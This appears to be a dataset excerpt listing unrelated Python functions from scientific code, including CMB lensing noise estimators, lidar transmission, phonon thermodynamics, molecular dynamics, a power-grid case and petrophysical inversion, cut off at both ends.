reporter.addBold(\"S=\"+hex(S))\n # Step 3. Shuffle transforming.\n Hout = transformPsi(S)\n for i in range(12):\n Hout = transformPsi(Hout)\n Hout = transformPsi(Hout ^ m)^Hin\n for i in range(61):\n Hout = transformPsi(Hout)\n return Hout", "def calcualte_inte_vn(pT_low, pT_high, data):\n npT = 50\n pT_inte_array = linspace(pT_low, pT_high, npT)\n dpT = pT_inte_array[1] - pT_inte_array[0]\n dN_event = data[:, 2]\n pT_event = data[:, 0]\n dN_interp = exp(interp(pT_inte_array, pT_event, log(dN_event+1e-30)))\n N_event = data[:, -1]\n N_interp = exp(interp(pT_inte_array, pT_event, log(N_event+1e-30)))\n N = sum(N_interp)*dpT/0.1\n temp_vn_array = [N,]\n for iorder in range(1, n_order):\n vn_real_event = data[:, 4*iorder]\n vn_imag_event = data[:, 4*iorder+2]\n vn_real_interp = interp(pT_inte_array, pT_event, vn_real_event)\n vn_imag_interp = interp(pT_inte_array, pT_event, vn_imag_event)\n vn_real_inte = (\n sum(vn_real_interp*dN_interp*pT_inte_array)\n /sum(dN_interp*pT_inte_array))\n vn_imag_inte = (\n sum(vn_imag_interp*dN_interp*pT_inte_array)\n /sum(dN_interp*pT_inte_array))\n vn_inte = vn_real_inte + 1j*vn_imag_inte\n temp_vn_array.append(vn_inte)\n return(temp_vn_array)", "def ER_Theory(N,Kappa) :\n\tMu2 = Kappa - ( 2*Kappa*(1.0 - (Kappa/N))*math.log(N) )**0.5 + (( (Kappa*(1.0 - (Kappa/N)))/math.log(N) )**0.5)*( math.log( (2*math.pi*math.log((N**2)/(2*math.pi))) ) - 0.5772)\n\treturn Mu2", "def OxygenTransmission(T,P,n_wv,wavelength,dr,freq_lim=np.array([lp.c/770e-9,lp.c/768e-9]),sim_nu=np.array([]),spec_file=''):\n # fraction of O2 by number density\n fO2 = (32*0.2320+28.02*0.7547+44.01*0.00046+39.94*0.0128+20.18*0.000012+4.0*0.0000007+83.8*0.000003+131.29*0.00004)*0.2320/32.0\n \n if len(spec_file) == 0:\n spec_file = '/Users/mhayman/Documents/DIAL/O2_HITRAN2012_760_781.txt'\n \n if sim_nu.size==0:\n sim_nu = np.arange(-3e9,3e9,20e6)\n \n# inu0 = np.argmin(np.abs(sim_nu)) # index to center of frequency array\n \n n_o2=fO2*(P/(lp.kB*T)-n_wv) # to convert atm to Pa use *101325\n ext_o2 = rb.ExtinctionFromHITRAN(lp.c/wavelength+sim_nu,T,P,(mO2*1e-3)/lp.N_A,nuLim=freq_lim,freqnorm=True,filename=spec_file).T\n T_o2 = np.exp(-np.cumsum(n_o2[np.newaxis,:]*ext_o2,axis=1)*dr)\n \n return T_o2,sim_nu", "def N_TT_EB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EB(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTB(l2)\n result += 0. #self.F_EB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_EB.__func__, \"integ\"):\n self.N_TT_EB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_EB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_EB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def test_post_nveto_pmts(self):\n pass", "def N_TB_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result += 0. #self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result *= self.F_TB(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TB_EE.__func__, \"integ\"):\n self.N_TB_EE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TB_EE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TB_EE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def compute_thermo(E,dos,TT):\n if (len(dos)<3):\n print (\"Not enough points in the phonon DOS!\")\n return None\n \n ZPE = 0.5*dos_integral(E,dos,1)\n modes = dos_integral(E,dos)\n \n EvibT = np.zeros(len(TT))\n SvibT = np.zeros(len(TT))\n CvibT = np.zeros(len(TT))\n FvibT = np.zeros(len(TT))\n for i in range(0,len(TT)):\n h = 0.5*(E[2]-E[0])\n arg = K_BOLTZMANN_RY*TT[i]\n arg2 = 2.0 * arg\n Evib = 0.0\n Svib = 0.0\n Cvib = 0.0\n for j in range(0,len(dos)-3,3):\n\n Evib += 3.0*E[j]/tanh(E[j]/(arg2))*dos[j]+\\\n 3.0*E[j+1]/tanh(E[j+1]/(arg2))*dos[j+1]+\\\n 2.0*E[j+2]/tanh(E[j+2]/(arg2))*dos[j+2]\n \n Svib += 3.0*(E[j]/arg2/tanh(E[j]/arg2)-log(2.0*sinh(E[j]/arg2)))*dos[j]+\\\n 3.0*(E[j+1]/arg2/tanh(E[j+1]/arg2)-log(2.0*sinh(E[j+1]/arg2)))*dos[j+1]+\\\n 2.0*(E[j+2]/arg2/tanh(E[j+2]/arg2)-log(2.0*sinh(E[j+2]/arg2)))*dos[j+2]\n\n try: # avoid overflow error for arg very small\n Cvib += 3.0*pow(E[j]/arg,2)/( 4.0*pow(sinh(E[j]/(arg2)),2) )*dos[j]+\\\n 3.0*pow(E[j+1]/arg,2)/( 4.0*pow(sinh(E[j+1]/(arg2)),2) )*dos[j+1]+\\\n 2.0*pow(E[j+2]/arg,2)/( 4.0*pow(sinh(E[j+2]/(arg2)),2) )*dos[j+2]\n except:\n Cvib += 0.0\n\n EvibT[i] = h*0.5*Evib*3.0/8.0 # h is the integration step, 0.5 comes from the equation for E,\n # the factor 3.0/8.0 comes from the Simpson 3/8 rule\n SvibT[i] = h*K_BOLTZMANN_RY*Svib*3.0/8.0\n CvibT[i] = h*K_BOLTZMANN_RY*Cvib*3.0/8.0\n FvibT = EvibT - SvibT * TT\n\n print ()\n return TT, EvibT, SvibT, CvibT, FvibT, ZPE, modes", "def prove_N() -> Proof:\n # Optional Task 6.8", "def test_simple():\n B = 100\n H = 20\n E = 210000\n sections = ((B, H, 0, E),)\n EI, top, bot = bm.EI(sections, E)\n EIc = E * B * (H ** 3) / 12\n assert 0.99 < EI / EIc < 1.01\n assert top == H / 2\n assert bot == -H / 2", "def gen_ep_data(self,ntrials,trlen):\n self.resort_emat()\n ## instruction\n # for each trial, generate random instruction encoding sequence\n i_encoding_input = np.array([\n np.random.permutation(np.arange(1,self.nmaps+1)) \n for i in range(ntrials)\n ])\n i_test_input = np.zeros([ntrials,trlen])\n i_input = np.concatenate([\n i_encoding_input,i_test_input],\n 1).astype(int).reshape(-1) # (ntrials,trlen+)\n ## stimulus\n x_encoding_input = i_encoding_input\n x_test_input = np.random.randint(1,self.nmaps+1,[ntrials,trlen])\n x_input = np.concatenate([x_encoding_input,x_test_input],1)\n # print('X',x_input)\n ''' \n embed x_input: \n [ntrials,nmaps+trlen] -> s_input [ntrials*(nmaps+trlen),edim]\n explicit loop required for flatten and embedd x_input\n because if switchmaps=1, matrix is resorted between trials\n and therefore same stimulus token integers correspond to\n different stimulus embeddings on different trials\n '''\n s_input = -np.ones([ntrials,(self.nmaps+trlen),self.stimdim])\n for trialn,x_input_trial in enumerate(x_input): \n if self.switchmaps: self.resort_emat()\n s_input[trialn] = self.emat[x_input_trial]\n # format output\n i_input = tr.unsqueeze(tr.LongTensor(i_input),1)\n s_input = tr.unsqueeze(tr.Tensor(np.concatenate(s_input)),1)\n yseq = tr.unsqueeze(tr.LongTensor(x_input.reshape(-1)),1)\n return i_input,s_input,yseq", "def N_TT_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTE(l2)\n result += self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_TE.__func__, \"integ\"):\n self.N_TT_TE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def N_TE_TB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_TB(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalEB(l2)\n result += 0. #self.F_TB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_TB.__func__, \"integ\"):\n self.N_TE_TB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_TB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_TB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def gen_ep_data(self,ntrials,trlen):\n ## instruction\n # for each trial, generate random instruction encoding sequence\n i_encoding_input = np.array([\n np.random.permutation(np.arange(1,self.nmaps+1)) \n for i in range(ntrials)\n ])\n i_test_input = np.zeros([ntrials,trlen])\n i_input = np.concatenate([\n i_encoding_input,i_test_input],\n 1).astype(int).reshape(-1) # (ntrials,trlen+)\n ## stimulus\n x_encoding_input = i_encoding_input\n x_test_input = np.random.randint(1,self.nmaps+1,[ntrials,trlen])\n x_input = np.concatenate([i_encoding_input,x_test_input],1)\n ''' \n embed x_input: \n [ntrials,nmaps+trlen] -> s_input [ntrials*(nmaps+trlen),edim]\n explicit loop required for flatten and embedd x_input\n because if switchmaps=1, matrix is resorted between trials\n and therefore same stimulus token integers correspond to\n different stimulus embeddings on different trials\n '''\n s_input = -np.ones([ntrials,(self.nmaps+trlen),self.stimdim])\n for trialn,x_input_trial in enumerate(x_input): \n if self.switchmaps: self.resort_emat()\n s_input[trialn] = self.emat[x_input_trial]\n \n # format output\n i_input = tr.unsqueeze(tr.LongTensor(i_input),1)\n s_input = tr.unsqueeze(tr.Tensor(np.concatenate(s_input)),1)\n yseq = tr.unsqueeze(tr.LongTensor(x_input.reshape(-1)),1)\n if return_trial_flag:\n tr_flag = np.concatenate([i*np.ones(self.nmaps+trlen) for i in range(ntrials)])\n tr_flag = tr.unsqueeze(tr.LongTensor(tr_flag),1)\n return tr_flag,i_input,s_input,yseq,\n else:\n return i_input,s_input,yseq", "def simulating_verlet(n,N,D,t,Rv,sigma,epsilon,dt,m,T,dim,kb,V,steps_r):\n Ekinv = np.zeros((n,1))\n Epotv = np.zeros((n,1))\n Ev = np.zeros((n,1))\n Gpc = np.zeros((steps_r,n))\n for k in range(len(t)):\n F = particle_forceV(Rv[-1], N, sigma, epsilon, D)\n Rv.append(particle_positionV(copy.deepcopy(Rv[-1]), V, dt, F, D)) \n V = particle_velocityV(V, F, dt, Rv, sigma, epsilon, D, N)\n Ekinv[k] = np.sum(1/(2*m)*(V**2))\n \n #Calibration\n if (int(k%(10)) == int(0) & int(k)<int(len(t)/2)):\n V = calibration(N, kb,T,Ekinv[k],V)\n Ekinv[k] = np.sum(1/(2*m)*(V**2))\n if int(k)> int(len(t)-50):\n Gpc[:,k], dist, dr = pair_correlation(N,Rv[-1],D,steps_r)\n Uv = particle_LJV(Rv[-1], N, D) \n Epotv[k] = abs(Uv)/2 \n Ev[k] = Ekinv[k]+Epotv[k]\n return Rv, Ekinv, Epotv, Ev, Gpc", "def case():\r\n #ppc = {\"version\": '2'}\r\n ppc = {}\r\n ##----- Power Flow Data -----##\r\n ## system MVA base\r\n ppc[\"baseMVA\"] = 100.0\r\n\r\n ## bus data\r\n # bus_i type Pd Qd Gs Bs area Vm Va baseKV zone Vmax Vmin\r\n ppc[\"bus\"] = array([\r\n [1, 3, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [2, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [3, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [4, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [5, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [6, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [7, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [8, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [9, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [10, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [11, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [12, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [13, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [14, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [15, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [16, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0]\r\n ])\r\n\r\n ## generator data\r\n # bus, Pg, Qg, Qmax, Qmin, Vg, mBase, status, Pmax, Pmin, Pc1, Pc2,\r\n # Qc1min, Qc1max, Qc2min, Qc2max, ramp_agc, ramp_10, ramp_30, ramp_q, apf\r\n ppc[\"gen\"] = array([\r\n [1,\t0,\t0,\t10,\t-10,\t1.0224,\t100,\t1,\t10,\t-10,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0, 0, 0,0, 0, 0],\r\n [3 ,0, 0, 50e-3, -50e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [5 , 0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [10 , 0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [13 ,0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [15 , 0, 0, 50e-3, -50e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0]\r\n ])\r\n load_b = array([2, 4, 9, 12, 14])\r\n ppc[\"bus\"][load_b, 2] = multiply(array([-2.1125, -0.2231, -0.1664, -0.0719, -1.4633]).T, 0.03)\r\n ppc[\"bus\"][load_b, 3] = multiply(array([1.6492, 0.4054, 0.8599, 0.8845, 0.6778]).T, 0.03)\r\n ## branch data\r\n # fbus, tbus, r, x, b, rateA, rateB, rateC, ratio, angle, status, angmin, angmax\r\n ppc[\"branch\"] = array([\r\n [1, 2, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [1, 8, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [1, 15, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 3, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 6, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 7, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [3, 4, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [4, 5, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 9, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 12, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 13, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [9, 10, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [9, 14, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [10, 11, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [15, 16, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0]\r\n ])\r\n R1 = 0.43\r\n L1 = 0.4e-3\r\n RS1 = 0.32\r\n LS1 = 0.39e-3\r\n Zbase = (0.4*0.4/100)\r\n branch_phase =array([\r\n [1, 1, 2, 188, R1, L1],\r\n [2, 1 ,8, 346, R1, L1],\r\n [3 ,1 ,15,501, R1 ,L1],\r\n [4, 2, 3, 130, RS1,LS1],\r\n [5, 2, 6, 145, RS1,LS1],\r\n [6, 2 ,7, 157, RS1,LS1],\r\n [7, 3, 4, 185, RS1,LS1],\r\n [8, 4, 5, 1000,RS1,LS1],\r\n [9, 8 ,9, 416, RS1,LS1],\r\n [10,8 ,12,130, RS1,LS1],\r\n [11,8 ,13,121, RS1,LS1],\r\n [12,9 ,10,130, RS1,LS1],\r\n [13,9 ,14,127, RS1,LS1],\r\n [14,10,11,251, RS1,LS1],\r\n [15,15,16,345, RS1,LS1]\r\n ])\r\n ppc[\"branch\"][:, [2,3]] = multiply(array([branch_phase[:, 4]*branch_phase[:, 3], branch_phase[:, 4]*branch_phase[:, 4]*100*pi]).T,0.001/Zbase)\r\n\r\n ##----- OPF Data -----##\r\n ## area data\r\n # area refbus\r\n\r\n\r\n ## generator cost data\r\n # 1 startup shutdown n x1 y1 ... xn yn\r\n # 2 startup shutdown n c(n-1) ... c0\r\n\r\n\r\n return ppc", "def E_Dynamic_MavkoEtAl2009(rhob,DTS,PR):\n E = (2*(rhob*1000)*((304800/DTS)**2)*(1+PR))/1000000\n return E", "def Char_Gate(NV,res ,B_field=400):\n\n\n #data = np.loadtxt(\"NV_Sim_8.dat\") #Placeholder data to test the script\n #NV = np.vstack((data[:,3],data[:,4]))\n #physical constants\n gamma_c = 1.071e3 #g-factor for C13 in Hz/G\n #Model parameters\n omega_larmor = 2*np.pi*gamma_c*B_field\n tau_larmor = 2*np.pi/omega_larmor\n tau = res[0]\n n_pulses = int(res[1]*2) #So that we do a pi -pulse\n\n Ix = 0.5 * np.array([[0,1],[1,0]])\n Iz = 0.5* np.array([[1,0],[0,-1]])\n H0 = (omega_larmor)*Iz\n exH0 =linalg.expm(-1j*H0*tau)\n\n\n M = np.zeros(np.shape(NV)[0])\n for idC in range(np.shape(NV)[0]):\n A= 2*np.pi*NV[idC,0]\n B= 2*np.pi*NV[idC,1] #Converts to radial frequency in Hz/G\n H1 = (A+omega_larmor) *Iz +B*Ix\n exH1 = linalg.expm(-1j*H1*tau)\n V0 = exH0.dot(exH1.dot(exH1.dot(exH0)))\n V1 = exH1.dot(exH0.dot(exH0.dot(exH1)))\n n0 = Calc_axis(V0)\n n1 =Calc_axis(V1)\n phi = np.real(2*np.arccos(np.trace(V0)/2))\n M[idC] = 1 - (1-np.dot(n0,n1))*np.sin(n_pulses * phi /2 )**2\n\n Signal = -M.prod()\n F = (1-(Signal+1)/2)\n return F", "def ORM1(RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n#\n# 5.1.1 Initialise Outputs & Check for missing values in inputs:\n# --------------------------------------------------------------\n\tPHIt=MissingValue\n\tPHIe=MissingValue\n\tCBW=MissingValue\n\tBVW=MissingValue\n\tHCPV=MissingValue\n\tVf=MissingValue\n\tVs=MissingValue\n\tSwt=MissingValue\n\tSwe=MissingValue\n\tVc1=MissingValue\n\tVc2=MissingValue\n\tVc3=MissingValue\n\tVk=MissingValue\n\tToc=MissingValue\n\tQc=MissingValue\n\tGDen=MissingValue\n\tif MissingValue in (RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n\t\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Vs,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen\n#\n# 5.1.2 Initialise parameters:\n# ----------------------------\n#\t5.1.2.1 Initialise Interation Control Paramaeters:\n#\t--------------------------------------------------\n\tNIter=0\n\tNIterMax=100\n\tErrIter=10000\n\tTolErrIter=0.0001\n\tIterEnd=0\n#\n#\t5.1.2.2 Initialise Volumes and Hydrocarbon Properties:\n#\t------------------------------------------------------\n\tVk=0.000 # Volume of kerogen initialised to zero\n\tVa=0.000 # Volume of adsorbed gas initialised to zero\n\tVf=0.000 # Volume of free gas initialised to zero\n#\n#\t5.7.3 Start interative loop:\n#\t-----------------------------\n\twhile IterEnd==0:\n#\n# 5.7.3.1 Compute Pore Fluid Properties:\n# --------------------------------------\n\t\tSum=Va+Vf\n\t\tif(Sum==0):\n\t\t\tDh=Df\n\t\t\tHIh=HIf\n\t\t\tDTh=DTf\n\t\telse:\n\t\t\tDh=(Va*Da+Vf*Df)/Sum\n\t\t\tHIh=(Va*HIa+Vf*HIf)/Sum\n\t\t\tDTh=(Va*DTa+Vf*DTf)/Sum\n\t\tDpf=(Sxoe*Dw)+(1-Sxoe)*Dh # Density of pore fluid\n\t\tHIpf=(Sxoe*HIw)+(1-Sxoe)*HIh # Hydrogen Index of pore fluid\n\t\tDTpf=(Sxoe*DTw)+(1-Sxoe)*DTh # DT of pore fluid\t\n#\n#\t5.7.3.2 Matrix Inversion:\n#\t-------------------------\n\t\tYMatrix = [RHOB,PHIN,DTCO,1] # Populate YMatrix\n\t\tAMatrix = [[Dc1,Dc2,Dk,Dpf],[HIc1,HIc2,HIk,HIpf],[DTc1,DTc2,DTk,DTpf],[1,1,1,1]] # Populate AMatrix\n\t\tXMatrix,Qc=SolveAndCorrect(AMatrix,YMatrix) # Solve for XMatrix\n\t\tVc1=XMatrix[0] # Volume of component 1\n\t\tVc2=XMatrix[1] # Volume of component 2\n\t\tVc3=0.000 # Volume of component 3 (not calculated in this routine).\n\t\tVk=XMatrix[2] # Volume of organic component\n\t\tPHIe=XMatrix[3] # Volume of hydrocarbon in organic and inorganic pores\n#\n#\t5.7.3.3 Determine Total & Effective Water Saturations:\n#\t-----------------------------------------------------\n\t\tPHIm=(Vc1*PHIc1)+(Vc2*PHIc2)+(Vc3*PHIc3) # Compute Micro Porosity\n\t\tPHIt=PHIm+PHIe\n\t\tSwe=fConnectivityModel(RD,Vc1,Vc2,Vc3,Vk,PHIe,Rc1,Rc2,Rc3,Rk,Rw,Rf,Cwv,Ckv,Alpha)\n\t\tif(PHIt==0):\n\t\t\tSwt=1.000\n\t\telse:\n\t\t\tSwt=(PHIm+PHIe*Swe)/PHIt\n#\n#\t5.7.4.3 Compute Volume of Adsorbed and Free Gas:\n#\t------------------------------------------------\n\t\tVa=RSK*Vk # Volume of adsorbed gas in organic pores\n\t\tHCPV=PHIt*(1-Swt)\n\t\tif(Va>=HCPV):\n\t\t\tVa=HCPV\n\t\tVf=HCPV-Va # Volume of free gas\t\n#\n# 5.4.4 Test for interative computations:\n# ---------------------------------------\n\t\tNIter=NIter+1\n\t\tif(NIter>=NIterMax):\n\t\t\tIterEnd=1\n\t\telse:\t\t\t\n\t\t\tif(NIter<=2):\n\t\t\t\tResultOld=[1,1,1,1,1,1,1,1,1] # Initial Setting\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\telse:\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\t\tif(ErrIter<=TolErrIter):\n\t\t\t\t\tIterEnd=1\n#\n# 5.4.6 Preoutput computations:\n# ------------------------------\n\tCBW=PHIm # The assumption is that all microporosity can be considered to be clay bound water.\n\tBVW=PHIe*Swe # Bulk volume of water\n\tHCPV=PHIt*(1-Swt) # Hydrocarbon pore volume\t\n\tToc=fToc_Wtf(Vc1,Vc2,Vc3,Vk,0,Ck,Dc1,Dc2,Dc3,Dk,Dw) # TOC-wt fraction. Note: Vrw=0 in fToc_Wtf(Vc1,Vc2,Vc3,Vk,Vrw,Ck,Dc1,Dc2,Dc3,Dk,Dw) # Total Organic Carbon wt%\n\tGDen=fOrmGDen(Vc1,Vc2,Vc3,Vk,0,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density. Note: Vrw=0 in fOrmGDen(Vc1,Vc2,Vc3,Vk,Vrw,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density g/cm3\n#\n# 5.4.7 Output Results:\n# \t-------------------\n\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Va,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen", "def TMM(x,N,n,trun_basis):\n Mat = np.zeros([len(trun_basis),len(trun_basis)])\n print('making TMM')\n perms = [int((x**n * iii)%N) for iii in trun_basis] # Modular multiplication\n for iii in range(len(trun_basis)):\n if trun_basis.__contains__(perms[iii]):\n Mat[iii,trun_basis.index(perms[iii])] = 1\n return Mat", "def TDErrorFunction(Prof,x,Trx,rb_spec,abs_spec,dr,inu0,bsrMult,base_T,base_P,r0,lam=[0,0,0,0,0,0]):\n \n iR = Prof['WV Online'].size # range index for a profile into 1D x array\n x2 = np.reshape(x,(iR+1,6))\n xK = x2[0,:] # constants [HSRL Mol HSRL Comb, WV On, WV Off, O2 On ,O2 Off]\n xS = x2[1:,:] # state vector [T, nWV, BSR, phi_HSRL, phi_WV, phi_O2]\n \n # HSRLProfile(T,BSR,phi,rb_spec,Trx,inu0,K,base_T,base_P)\n HSRL_mol = HSRLProfile(xS[:,0],xS[:,2],xS[:,3],rb_spec['HSRL'],Trx['HSRL Mol'],inu0['HSRL'],xK[0],base_T,base_P)+Prof['HSRL Mol BG']\n HSRL_comb = 